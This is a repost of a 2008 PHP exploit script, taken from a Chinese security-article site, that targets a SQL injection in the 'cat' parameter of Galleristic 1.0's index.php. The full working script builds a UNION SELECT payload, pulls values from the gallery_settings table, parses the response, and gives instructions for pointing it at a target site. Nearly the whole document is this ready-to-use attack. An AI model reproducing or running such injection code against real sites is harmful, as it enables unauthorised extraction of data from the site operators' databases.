Galleristic 1.0 (index.php cat) Remote SQL Injection Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Galleristic 1.0 (index.php cat) Remote SQL Injection Exploit

来源：www.vfcocus.net 作者：cOndemned 发布时间：2008-05-08

<?php

#
#   Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
#   Author : cOndemned
#   Note : works only when magic_quotes_gpc = off
#   Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#

function exploit($target, $v) {

    $injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
    $request = file($target . $injection);

    for($i = 0; $i < count($request); $i++) {

        preg_match('/\'(.*)\'<\/h2>/', $request[$i], $response);

        if(!empty($response[1])) {
            return $response[1] . '<br />';
        }
    }
}

#   Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
if(empty($_GET['target'])) {
    die('No target site specified!');
}
else {
    for($c = 1; $c < 3; $c++) {
        echo exploit($_GET['target'], $c);
    }
}

?>

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告